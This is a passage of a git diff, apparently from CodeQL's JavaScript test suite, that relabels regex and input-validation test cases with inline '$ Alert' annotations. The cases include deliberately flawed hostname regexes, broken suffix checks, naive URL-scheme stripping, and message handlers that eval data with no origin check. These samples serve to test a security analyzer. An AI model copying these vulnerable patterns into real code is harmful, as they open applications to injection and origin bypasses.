+++ b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js @@ -1,2 +1,2 @@ -/[]/; +/[]/; // $ Alert /[^]/; diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js index 7591d00c4411..18e9a4328d90 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js @@ -1,5 +1,5 @@ -var escaped = raw.replace(/"/g, '\"'); +var escaped = raw.replace(/"/g, '\"'); // $ Alert (function() { var indirect = /"/g; - raw.replace(indirect, '\"'); + raw.replace(indirect, '\"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref index f8b9c39b11ff..97214a93be45 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref @@ -1 +1,2 @@ -RegExp/IdentityReplacement.ql \ No newline at end of file +query: RegExp/IdentityReplacement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); + return a.replace(/<\!--(?!{cke_protected})[\s\S]+?--\>/g, "foo"); // $ Alert } /\u{ff}/ diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref index acdde814bbcb..a65bb3ab3512 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref @@ -1 +1,2 @@ -RegExp/RegExpAlwaysMatches.ql \ No newline at end of file +query: RegExp/RegExpAlwaysMatches.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js @@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { @@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { @@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected @@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref index bbcc8421a409..c653d8604aa9 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref @@ -1 +1,2 @@ -RegExp/UnboundBackref.ql \ No newline at end of file +query: RegExp/UnboundBackref.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..df5b4144172e 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; -/^(?\s+)\w+\k$/; +/^(?\s+)\w+\2$/; // $ Alert +/^(?\s+)\w+\k$/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref index 13297fa2c9be..ee3a5c95eebf 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref @@ -1 +1,2 @@ -RegExp/UnmatchableCaret.ql \ No newline at end of file +query: RegExp/UnmatchableCaret.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js @@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref index f6798fd1ffa1..c79d650f18e1 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref @@ -1 +1,2 @@ -RegExp/UnmatchableDollar.ql \ No newline at end of file +query: RegExp/UnmatchableDollar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert @@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref index f9eb315d150f..04e603e63d42 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncorrectSuffixCheck.ql +query: Security/CWE-020/IncorrectSuffixCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js index 0b60fec15383..55e9a7d37611 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js @@ -1,3 +1,3 @@ function endsWith(x, y) { - return x.lastIndexOf(y) === x.length - y.length; + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js @@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index = x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { @@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref index 02296c134e1a..bd895fa2e47e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref @@ -1 +1,2 @@ -Security/CWE-020/MissingOriginCheck.ql \ No newline at end of file +query: Security/CWE-020/MissingOriginCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref index 5860f4b3a82a..a762ad6f8385 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref @@ -1 +1,2 @@ -Security/CWE-020/MissingRegExpAnchor.ql \ No newline at end of file +query: Security/CWE-020/MissingRegExpAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..6fc6d6296204 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js @@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { @@ -79,23 +79,23 @@ /* * NOT OK: flagged */ - /(\.xxx)|(\.yyy)|(\.zzz)$/; + /(\.xxx)|(\.yyy)|(\.zzz)$/; // $ Alert /(^left|right|center)\sbottom$/; // not flagged at the moment due to interior anchors - /\.xxx|\.yyy|\.zzz$/ig; - /\.xxx|\.yyy|zzz$/; + /\.xxx|\.yyy|\.zzz$/ig; // $ Alert + /\.xxx|\.yyy|zzz$/; // $ Alert /^([A-Z]|xxx[XY]$)/; // not flagged at the moment due to interior anchors - /^(xxx yyy zzz)|(xxx yyy)/i; - /^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; - /^(xxx:)|(yyy:)|(zzz:)/; - /^(xxx?:)|(yyy:zzz\/)/; - /^@media|@page/; - /^\s*(xxx?|yyy|zzz):|xxx:yyy\//; - /^click|mouse|touch/; - /^http:\/\/good\.com|http:\/\/better\.com/; - /^https?:\/\/good\.com|https?:\/\/better\.com/; - /^mouse|touch|click|contextmenu|drop|dragover|dragend/; - /^xxx:|yyy:/i; - /_xxx|_yyy|_zzz$/; + /^(xxx yyy 